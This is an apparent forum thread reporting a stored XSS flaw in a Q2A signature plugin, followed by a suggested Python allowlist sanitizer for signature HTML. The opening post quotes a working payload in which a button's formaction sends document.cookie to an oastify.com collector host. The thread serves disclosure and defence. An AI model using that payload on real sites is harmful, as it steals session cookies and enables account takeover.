It's possible to inject JS into a user's signature that leads to account takeover.
Attackers change their signature to the following XSS payload, and such JS will be executed if users click such a button.
Hi<button type="test" formaction="javascript: alert('You have been hacked!'), fetch('https://xxxxxxxxxxxxxxxxxxxx.oastify.com?c=' +document.cookie)">CLICK HERE</button>
See example from our forum.
Is there a solution to avoid this?
We use the following plugin for Signature: https://github.com/NoahY/q2a-signatures
Thanks.
I have "fixed" the case (if we can say that) by enabling an option to not allow HTML.
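Disabling HTML entirely is the blunt fix; the alternative is to keep a small allowlist of tags and attributes and reject everything else server-side before the signature is stored or rendered. The sanitizer below is an added example written for this thread, not code from the q2a-signatures plugin (which is PHP) or from Q2A itself. The allowed tag and attribute sets, the URL scheme allowlist, the added rel attribute on links, and the sample signatures in the usage block are all assumptions chosen for illustration.

```python
"""Allowlist sanitizer for user-controlled signature HTML.

Added example for illustration; not part of the forum thread or of the
q2a-signatures plugin. Policy constants below are assumed, not Q2A's.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed policy: only simple inline formatting and plain links survive.
# Anything form-related (button, form, input) or script-capable is dropped.
ALLOWED_TAGS = {"b", "i", "em", "strong", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}


def _safe_url(value: str) -> bool:
    """Accept relative paths and absolute URLs whose scheme is allowlisted.

    Whitespace and control characters are removed first, because browsers
    ignore them inside a scheme while a naive string check would not.
    """
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    parsed = urlparse(cleaned)
    if parsed.scheme == "":
        return not cleaned.startswith("//")  # no protocol-relative URLs
    return parsed.scheme.lower() in SAFE_SCHEMES


class SignatureSanitizer(HTMLParser):
    """Rebuilds the input from allowlisted pieces only; unknown markup is dropped,
    text is re-escaped, and open tags are balanced on output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.dropped = []  # what was removed; handy for logging/alerting on abuse

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")  # covers on*, formaction, style...
                continue
            if name == "href" and not _safe_url(value or ""):
                self.dropped.append(f"{tag}@href")
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        if tag == "a":
            kept.append(' rel="nofollow noopener"')  # assumed hardening for outbound links
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in ALLOWED_TAGS or tag in VOID_TAGS or tag not in self.open_tags:
            return  # stray or disallowed close tag: drop it
        while self.open_tags:  # close anything nested inside, then the tag itself
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

    # comments, doctype and processing instructions fall through to the
    # HTMLParser defaults, which emit nothing, so they are silently dropped.

    def result(self) -> str:
        self.close()
        while self.open_tags:  # balance whatever the user left unclosed
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_and_report(raw_html: str):
    """Return (clean_html, dropped_items) so callers can store one and log the other."""
    parser = SignatureSanitizer()
    parser.feed(raw_html)
    return parser.result(), parser.dropped


def sanitize_signature(raw_html: str) -> str:
    return sanitize_and_report(raw_html)[0]


if __name__ == "__main__":
    # Constructed samples shaped like the signature in the post above.
    hostile = 'Hi<button type="test" formaction="javascript:alert(1)">CLICK HERE</button>'
    benign = '<b>Hi</b> <a href="https://example.com/u/1">profile</a>'
    print(sanitize_signature(hostile))
    print(sanitize_signature(benign))
```

The point of the `dropped` list is that a signature update which sheds a `button` or an `@formaction` is itself a signal: log it with the user id so moderators see who is probing the form.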